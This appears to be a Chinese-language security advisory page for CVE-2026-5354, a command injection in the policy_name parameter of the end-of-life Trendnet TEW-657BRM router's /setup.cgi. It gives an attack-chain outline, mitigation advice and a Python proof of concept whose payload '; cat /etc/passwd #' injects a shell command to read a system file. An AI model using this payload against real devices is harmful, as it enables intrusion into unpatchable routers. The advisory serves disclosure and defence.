CVE-2026-5354 CVSS 6.3 中危

CVE-2026-5354 Trendnet TEW-657BRM命令注入漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5354

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Trendnet TEW-657BRM

漏洞概述

Trendnet TEW-657BRM 1.00.1版本存在操作系统命令注入漏洞。该漏洞位于/setup.cgi文件的vpn_connect函数中，由于对policy_name参数缺乏有效过滤，导致远程攻击者可注入恶意命令并执行。鉴于该产品已停止支持，无法获得官方补丁，建议立即更换设备。

技术细节

该漏洞的具体成因在于Trendnet TEW-657BRM路由器固件版本1.00.1中的Web管理接口/setup.cgi脚本。当脚本处理VPN连接相关请求时，调用了vpn_connect函数。该函数直接从HTTP请求中获取policy_name参数，并将其传递给后台系统Shell执行，中间未进行任何安全过滤或转义。攻击者可以通过构造包含Shell元字符（如分号、管道符等）的恶意数据包发送至该接口，从而欺骗系统执行攻击者指定的任意命令。由于该漏洞可通过网络远程触发且无需用户交互，攻击者一旦利用成功，即可获取设备底层系统的控制权限，造成数据泄露或服务中断。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Trendnet TEW-657BRM设备及其Web管理接口。

STEP 2

武器化

攻击者构造包含恶意Shell命令的HTTP POST请求，重点针对policy_name参数进行注入。

STEP 3

投递

攻击者将构造好的恶意请求发送至目标设备的/setup.cgi端点。

STEP 4

利用

目标设备解析请求，将policy_name参数值直接传入Shell执行，导致攻击者的恶意命令在系统上运行。

STEP 5

安装与行动

攻击者利用获取的Shell权限建立后门，窃取敏感信息或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Trendnet TEW-657BRM 1.00.1 - OS Command Injection (CVE-2026-5354)
# Vulnerable File: /setup.cgi
# Vulnerable Parameter: policy_name

target_url = "http://192.168.10.1/setup.cgi"

# Payload to execute 'cat /etc/passwd' via command injection
# Using semicolon to chain commands
payload = "; cat /etc/passwd #"

data = {
    "submit_button": "vpn_connect",
    "change_action": "gozila_cgi",
    "policy_name": payload
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Exploit sent successfully!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Failed to send exploit. Status code:", response.status_code)
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Trendnet TEW-657BRM 1.00.1

防御指南

临时缓解措施

由于该产品已于2011年6月23日停止生命周期（EOL）且不再受官方支持，厂商不会发布安全补丁。唯一的彻底解决方案是更换为现代且受支持的设备。若暂时无法更换，必须通过防火墙严格限制对设备管理端口的访问，并确保设备不直接暴露于互联网。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5354
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5354
3 Details https://www.cvedetails.com/cve/CVE-2026-5354/
4 VulDB https://vuldb.com/cve/CVE-2026-5354
5 Link https://github.com/panda666-888/vuls/blob/main/trendnet/tew-657brm/vpn_connect.md
6 Link https://vuldb.com/submit/781568
7 Link https://vuldb.com/vuln/354707
8 Link https://vuldb.com/vuln/354707/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表